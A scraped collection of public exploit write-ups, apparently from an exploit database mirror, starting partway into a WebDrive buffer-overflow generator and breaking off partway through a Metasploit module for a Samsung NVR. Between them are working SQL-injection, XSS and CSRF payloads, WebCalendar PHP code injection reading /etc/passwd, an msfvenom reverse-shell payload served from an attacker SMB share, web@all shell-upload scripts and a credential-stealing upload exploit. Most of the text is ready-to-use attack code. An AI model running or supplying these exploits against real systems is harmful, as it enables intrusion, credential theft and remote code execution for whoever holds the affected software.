buffer="http://"
buffer+="\x41" * 70000
off=buffer

try:
	out_file = open("WebDrive.txt",'w')
	out_file.write(off)
	out_file.close()
	print("[*] Malicious txt file created successfully")
except:
	print "[!] Error creating file"


Reference(s):
http://www.webdrive.com/products/webdrive/
https://www.webdrive.com/products/webdrive/download/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and input restriction of the vulnerable URL/Adress parameters.


Security Risk:
==============
The security risk of the buffer overflow vulnerability in the URL/Address parameter is estimated as high. (CVSS 6.8)


Credits & Authors:
==================
metacom


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
# Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
# Date: 18-11-2020
# Exploit Author: Aakash Madaan
# Vendor Homepage: https://webdamn.com/
# Software Link : https://webdamn.com/user-management-system-with-php-mysql/
# Version: N/A (Default)
# Tested on: Windows 10 professional

Steps to reproduce:
1. Open user login page using following URl:
-> http://localhost/login.php <http://localhost/login.html>

2. If attacker get access to valid email address ( leaked data or by any
other means) then he/she can use the email address as follows:
Payload: <email>' OR '1'='1
NOTE: Use the above payload in both username and password fields

3. Server accepts the payload and the attacker is able to bypass the user
login panel with only email address.
HireHackking 
# Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)
# Date: 4/07/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/
# Version: 6.5 and Below
# CVE : CVE-2021-31682

--Summary--

The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. 

Automated Logic
https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/

--Affects--

- WebCTRL OEM
- Versions 6.5 and prior

--Details--

The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. This can allow for several issues including but not limited to:

- Hijacking a user's session
- Using XSS payloads to capture input (keylogging)


-- Proof of Concept --
The following URL parameter was impacted and can be exploited with the sample payload provided below:
- https://example.com/index.jsp?operatorlocale=en/><script>alert("xss")</script> 

--Mitigation--

Sanitize any user controlled input in both form fields and URL parameters to properly encode data so it is not rendered as arbitrary HTML/JavaScript.

--Timeline--

- 4/07/2021: XSS Vulnerability was discovered and documented. 
- 4/17/2021: A temporary CVE identifier was requested by MITRE. Automated Logic was also notified with the full details of each finding via their product security contact at https://www.automatedlogic.com/en/about/security-commitment/. A baseline 90 day disclosure timeline was established in the initial communication.
- 7/23/2021: MITRE Assigns CVE ID CVE-2021-31682 to the vulnerability.
- 9/08/2021: Automated Logic formally responds requesting the CVE identifier and states that the issue should be patched in newer versions of the product.
- 10/20/2021: The researcher responds with the CVE identifier and a request for all impacted version numbers so they can release a more accurate impacted list of products when full disclosure occurs. Automate Logic responds with a list of impacted versions the same day, and the researcher publicly discloses the issue and submits a CVE details update request to MTIRE.
HireHackking 
# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution
# Date: 9/27/2023
# Exploit Author: ItsSixtyN3in
# Vendor Homepage: https://webcatalog.io/en/
# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe
# Version: 48.4.0
# Tested on: Windows
# CVE : CVE-2023-42222

Vulnerability summary:
WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.

Exploit details:

-   Create a reverse shell file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe



-   Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)

python3 smbserver.py Tools -smb2support



-   Have the user sync a page with the payload as a renamed link

[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)



Payload:
search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title

Tobias Diehl
Security Consultant
OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300
Pronouns: he/him
e-mail:  tobias.diehl@bulletproofsi.com
HireHackking 
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt

[+] ISR: ApparitionSec



Vendor:
==========================
www.k5n.us/webcalendar.php



Product:
==================
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
Interbase, MS SQL Server, or ODBC is required.

WebCalendar can be setup in a variety of ways, such as...

A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new
events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.




Vulnerability Type:
======================
CSRF PROTECTION BYPASS



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

WebCalendar attempts to uses the HTTP Referer to check that requests are
originating from same server as we see below.

From WebCalendar "include/functions.php" file on line 6117:

////////////////////////////////////////////////////////////

function require_valide_referring_url ()
{

 global $SERVER_URL;


if ( empty( $_SERVER['HTTP_REFERER'] ) ) {

   // Missing the REFERER value

 //die_miserable_death ( translate ( 'Invalid referring URL' ) );

 // Unfortunately, some version of MSIE do not send this info.

  return true;
  }

if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {

  // Gotcha.  URL of referring page is not the same as our server.

// This can be an instance of XSRF.

// (This may also happen when more than address is used for your server.

// However, you're not supposed to do that with this version of

// WebCalendar anyhow...)
    die_miserable_death ( translate ( 'Invalid referring URL' ) );

 }

}

/////////////////////////////////////////////////////////////////////////////////////////

However, this can be easily defeated by just not sending a referer. HTML 5
includes a handy tag <meta name="referrer" content="none"> to omit the
referer
when making an HTTP request, currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send
no referrer
and the vulnerable application will then happily process our CSRF requests.



Exploit code(s):
===============

1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.


<meta name="referrer" content="none">

<form id="CSRF" action="
http://localhost/WebCalendar-1.2.7/edit_user_handler.php"  method="post">
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567"  />
<input name="upassword2" id="newpass2" type="password"  value="1234567" />
</form>


2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"

<meta name="referrer" content="none">

<form id="CSRF_ACCESS_CTRL" action="
http://localhost/WebCalendar-1.2.7/admin.php" method="post"
name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y"  />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>


#######################################################

Vulnerability Type:
======================
PHP Code Injection



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

Since WebCalendars install script is not removed after installation as
there is no "automatic" removal of it, low privileged users can inject
arbitrary
PHP code for the "Database Cache" directory value as no input validation
exists for this when a user installs the application using the WebCalendar
walk
thru wizard.

If WebCalendars installation script is available as part of a default
image, often as a convenience by some hosting providers, this can be used
to gain
code execution on the target system. The only item that is required is the
user must have privileges to authenticate to the MySQL Database and to run
the
install script. So, users who have install wizard access for the
WebCalendar application will now have ability to launch arbitrary system
commands on the
affected host.

One problem we must overcome is WebCalendar filters quotes " so we cannot
use code like <?php echo "/bin/cat /etc/passwd"; ?> However, we can defeat
this
obstacle using the all to forgotten backtick `CMD` operator!.

e.g.

*/?><?php echo `/bin/cat /etc/passwd`; ?>

This results in "settings.php" being injected like...

<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>



Exploitation steps(s):
=====================

1) Login to the WebCalendar Installation Wizard.

2) When you get to WebCalendar Installation Wizard Step 2 of the install
script.
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2

3) Click "Test Settings" button to ensure connection to the Database.
4) Enter below PHP code for the "Database Cache Directory:" input fields
value to pop calculator for POC (Windows).

*/?><?php exec(`calc.exe`); ?>

5) Click "Next" button
6) Click "Next" button
7) Click "Save settings" button

BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.

If you happen to get following error when clicking "Test Settings" button,
"Failure Reason: Database Cache Directory does not exist", just click back
button then forward or just "Test settings" button again to try get past
the error.


Disclosure Timeline:
===============================
Vendor Notification:  No replies
July 4, 2016 : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
HireHackking 
Title - Web2py 2.14.5 Multiple Vulnerabilities LFI,XSS,CSRF

# Exploit Title : Web2py 2.14.5 Multiple Vulnerabilities LFI, XSS,CSRF
# Reported Date : 2-April-2016
# Fixed Date : 4-April-2016
# Exploit Author : Narendra Bhati - https://www.exploit-db.com/author/?a=7638
# CVE ID : LFI - CVE-2016-4806 , Reflected XSS - CVE-2016-4807 , CSRF - CVE-2016-4808
# Tested On : MAC OS X EI Capitan, Windows 7 64 Bit, Most Linux Platforms.
# Fix/Patching : Update To Web2py. 2.14.6
# Facebook : https://facebook.com/iambhati
# Twitter : http://twitter.com/NarendraBhatiB
# Detailed POC: http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
==============================================


LFI(Local File Inclusion): CVE-2016-4806

POST URI - /admin/default/pack_custom/[applicationmame]

Vulnerable Parameter = file

Exploit - file=/etc/passwd

Authentication Required = Yes(Administrator)

Steps To Reproduction

1) HTTP Request 

POST /admin/default/pack_custom/[applicationname] HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/admin/default/pack_custom/dasdasdasdad
Cookie: session_id_welcome=asdadasdasdasdasd; session_id_admin=asdasdasdasdasd
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3213

file=/etc/passwd

2) After sending this request, Application will prompt you with a file to download as an extension of "w2p".

3) Now we have to unpack this downloaded file using. https://github.com/pigeonflight/web2py-unpacker

I.e. 
Command for unpacking w2p file
python web2py-unpacker.py downloadfile.w2p

4) This command will create a folder called "unpack", In this folder there will be an another folder of the application of web2py. In this folder you will found the etc folder, Then into this folder you will get the passwd file.


Video POC - https://www.youtube.com/watch?v=paCvmHgomP4

Full Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/

========================================================================

Reflected XSS(Cross Site Scripting) : CVE-2016-4807

GET URI  - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl

Vulnerable Parameter - source

Exploit - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)

Authentication Required - Yes(Administrator)

Steps To Reproduction

1) Go to this URL - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)

2) The parameter "source" value will get reflected on the page on "Here" button.

3) When you will click on that button "Here" XSS payload will get executed.

Video POC - https://www.youtube.com/watch?v=4j9hXJtVNbk

Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/

============================================================================


CSRF(Cross Site Request Forgery): CVE-2016-4808

GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname]

Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname]

Authenticated Required - Yes(Administrator)


Steps To Reproduction

1) Suppose we have an application in web2py called "testingapp"

2) An attacker can trick an victim to disable the installed application just By sending this URL to victim - http://127.0.0.1:8000/admin/default/enable/testingapp

Video POC - https://www.youtube.com/watch?v=d4V8qlNrYtk

Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
HireHackking 
source: https://www.securityfocus.com/bid/55426/info

web@all is prone to a local file-include vulnerability and multiple arbitrary file-upload vulnerabilities.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

web@all 2.0 is vulnerable; other versions may also be affected. 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Web@all CMS v2.0 <= (ShellUpload/LFI) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : php - WebApp - Multiple - 0day
# Type : Multiple Vulnerabilities
# Tested on : Windows XP-SP3 (Fr) / Linux.BackTrack5-rc2 (En)
# Founder : [http://webatall.org]
###

# <3 <3 Greetings t0 Palestine <3 <3
# Greetings bY {KhalEd Ked'Ans} ^___^ I MiSS yA'll br0thEr'S <3

# n0 d0Rk's Kidd's d0 S0me W0rk's yaa33' -_-"

<!-- Proof of Concept ,p0c(1) -->
<!-- Shell Upload .PHP -->
<?php

$uploadfile="inj3ct0r.php";
$ch = curl_init("http://[Target]/[path]/my/kindeditor/php/upload_json.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('imgFile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

[*] 0r Use TemperDATA ->(/[path]/my/kindeditor/php/upload_json.php) and POST u'R Sh3lL

[!] Change inj3ct0r.php -> t0 U'r Sh3lL '_*
[+] Access Shell http://[Target]/[path]/file/[ Ym 'dir]/{raW-File-Name}.php

<!-- Proof of Concept ,p0c(2) -->
<!-- Shell Upload .GIF -->
<?php

$uploadfile="inj3ct0r.gif";
$ch = curl_init("http://[Target]/[path]/inc/cls_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('tmp_name'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

[*] 0r Use TemperDATA ->(/[path]/inc/cls_upload.php) and POST u'R Sh3lL

[!] Change inj3ct0r.gif -> t0 U'r Sh3lL '_*
[+] Access Shell http://[Target]/[path]/file/temp/[ Ym 'dir]/{raW-File-Name}.gif

<!-- Proof of Concept ,p0c(3) -->
<!-- Local File Include -->
<?php
$lfi =
curl_init("http://[Target]/[path]/my/kindeditor/index.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
  array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>

[*] 0r Use TemperDATA ->(/[path]/my/kindeditor/index.php) POST and GET s0me Local File's

#### << ThE|End -- Go0d'LuCk All .:-'___'-:. 

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem 
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================
HireHackking 
source: https://www.securityfocus.com/bid/54109/info

web@all is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible. 

http://www.example.com/search.php?_text[title]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/54466/info

web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

web@all 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/webatall-2.0/my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E
HireHackking 
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows

# Vulnerable parameter: PF (member_profile.asp)
# GET Request

GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1
HireHackking 
source: https://www.securityfocus.com/bid/55220/info

Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Web Wiz Forums 10.03 is vulnerable; other versions may also be affected. 

http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E

http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E

http://www.www.example.com/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage="><script>alert(0);</script>&TopicID=57676
HireHackking 
# Exploit Title: Unrestricted file upload vulnerability - Web Viewer 1.0.0.193 on Samsung SRN-1670D
# Date: 2017-06-19
# Exploit Author: Omar MEZRAG - 0xFFFFFF / www.realistic-security.com
# Vendor Homepage: https://www.hanwhasecurity.com
# Version: Web Viewer 1.0.0.193 on Samsung SRN-1670D
# Tested on: Web Viewer 1.0.0.193 
# CVE : CVE-2017-16524
##
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'digest'

class MetasploitModule < Msf::Exploit::Remote
  	
  	Rank = GoodRanking
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::PhpEXE

	def initialize(info = {})
	    super(update_info(info,
	      'Name'           => 'Samsung SRN-1670D - Web Viewer Version 1.0.0.193 Arbitrary File Read & Upload',
	      'Description'    => %q{
		This module exploits an Unrestricted file upload vulnerability in 
		Web Viewer 1.0.0.193 on Samsung SRN-1670D devices: 'network_ssl_upload.php' 
		allows remote authenticated attackers to upload and execute arbitrary
		PHP code via a filename with a .php extension, which is then accessed via a
		direct request to the file in the upload/ directory. 
		To authenticate for this attack, one can obtain web-interface credentials 
		in cleartext by leveraging the existing Local File Read Vulnerability 
		referenced as CVE-2015-8279, which allows remote attackers to read the 
		web interface credentials via a request for the
		cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI.
	      },

	      'Author'         => [
		'Omar Mezrag <omar.mezrag@realistic-security.com>',  # @_0xFFFFFF
	        'Realistic Security',
	        'Algeria'
	       ],
	      'License'        => MSF_LICENSE,
	      'References'     =>
	        [
	          [ 'CVE', '2017-16524' ],
	          [ 'URL', 'https://github.com/realistic-security/CVE-2017-16524' ],
	          [ 'CVE', '2015-8279' ],
	          [ 'URL', 'http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html' ]
	        ],
	      'Privileged'     => true,
	      'Arch'           => ARCH_PHP,
	      'Platform'       => 'php',
	      'Targets'        =>
	        [
			['Samsung SRN-1670D == 1.0.0.193', {}]
	        ],
	      'DefaultTarget'  => 0,
	      'DisclosureDate' => 'Mar 14 2017'
	    ))

	    register_options(
	      [
	        OptString.new('RHOST', [ true, 'The target address.' ]),
		OptString.new('RPORT', [ true, 'The target port (TCP).', '80' ]),
	      ])
	end


	def check
		#
		print_status('Checking version...') 

	 	resp = send_request_cgi({
			'uri'     =>  "/index",
			'version' => '1.1',
			'method' => 'GET',
			'headers' =>
				{
				   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
				}
	        })
	    
		unless resp
			print_error("Connection timed out.")
			return Exploit::CheckCode::Unknown
		end
		#        <!---------------------------------   File Version 1.0.0.193   --------------------------------->
		version = nil
		if resp and resp.code == 200  and resp.body.match(/Web Viewer for Samsung NVR/)
				if resp.body =~ /File Version (\d+\.\d+\.\d+\.\d+)/
					version = $1
					if version == '1.0.0.193'
						print_good "Found vesrion: #{version}"
						return Exploit::CheckCode::Appears
					end
				end
		end

		Exploit::CheckCode::Safe

	end

  	def exploit

	 
		print_status('Obtaining credentails...') 
	 
	 	resp = send_request_cgi({
			'uri'     =>  "/cslog_export.php",
			'version' => '1.1',
			'method' => 'GET',
			'vars_get'=>
				{
				'path' => '/root/php_modules/lighttpd/sbin/userpw',
				'file' => 'foo'
				},
			'headers' =>
				{
				   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
				}
	        })
		
		unless resp
			print_error("Connection timed out.")
			return Exploit::CheckCode::Unknown
		end

		if resp and resp.code == 200 and resp.body !~ /Authentication is failed/ and resp.body !~ /File not found/
			username =  resp.body.split(':')[0]
			password =  resp.body.split(':')[1].gsub("\n",'')
			print_good "Credentials obtained successfully: #{username}:#{password}"
				

				data1 = Rex::Text.encode_base64("#{username}")
				data2 = Digest::SHA256.hexdigest("#{password}")

				randfloat  = Random.new
				data3 =  randfloat.rand(0.9)
				data4 = data3

				print_status('Logging...') 

			 	resp = send_request_cgi({
					'uri'     =>  "/login",
					'version' => '1.1',
					'method' => 'POST',
					'vars_post'=>
						{
							'data1' => data1,
							'data2' => data2,
							'data3' => data3,
							'data4' => data4
						},
					'headers' =>
						{
						   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
						   'DNT' => "1",
						   'Cookie' => "IESEVEN=1"
						}
				})

				unless resp
					print_error("Connection timed out.")
					return Exploit::CheckCode::Unknown
				end
				
				if resp and resp.code == 200  and resp.body !~ /ID incorrecte/  and resp.body =~ /setCookie\('NVR_DATA1/

					print_good('Authentication Succeeded') 

					nvr_d1 = $1 if resp.body =~ /setCookie\('NVR_DATA1', '(\d\.\d+)'/
					nvr_d2 = $1 if resp.body =~ /setCookie\('NVR_DATA2', '(\d+)'/
					nvr_d3 = $1 if resp.body =~ /setCookie\('NVR_DATA3', '(0x\h\h)'/
					nvr_d4 = $1 if resp.body =~ /setCookie\('NVR_DATA4', '(0x\h\h)'/
					nvr_d7 = $1 if resp.body =~ /setCookie\('NVR_DATA7', '(\d)'/
					nvr_d8 = $1 if resp.body =~ /setCookie\('NVR_DATA8', '(\d)'/
					nvr_d9 = $1 if resp.body =~ /setCookie\('NVR_DATA9', '(0x\h\h)'/

					cookie = "IESEVEN=1; NVR_DATA1=#{nvr_d1}; NVR_DATA2=#{nvr_d2}; NVR_DATA3=#{nvr_d3}; NVR_DATA4=#{nvr_d4}; NVR_DATA7=#{nvr_d7}; NVR_DATA8=#{nvr_d8}; NVR_DATA9=#{nvr_d9}"

					payload_name = "#{rand_text_alpha(8)}.php"

					print_status("Generating payload[ #{payload_name} ]...") 

					php_payload = get_write_exec_payload(:unlink_self=>true)
				
					print_status('Uploading payload...') 

					data = Rex::MIME::Message.new
					data.add_part("2", nil, nil, 'form-data; name="is_apply"')
					data.add_part("1", nil, nil, 'form-data; name="isInstall"')
					data.add_part("0", nil, nil, 'form-data; name="isCertFlag"')
					data.add_part(php_payload, 'application/x-httpd-php', nil, "form-data; name=\"attachFile\"; filename=\"#{payload_name}\"")
					post_data = data.to_s

					resp = send_request_cgi({

						'uri'      => normalize_uri('/network_ssl_upload.php'),
						'method'   => 'POST',
						'vars_get' => 
							{
							'lang' => 'en'
							},
						'headers' =>
							{
							   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
							},
						'ctype'    => "multipart/form-data; boundary=#{data.bound}",
						'cookie'   => cookie,
						'data'     => post_data

					    })

					unless resp
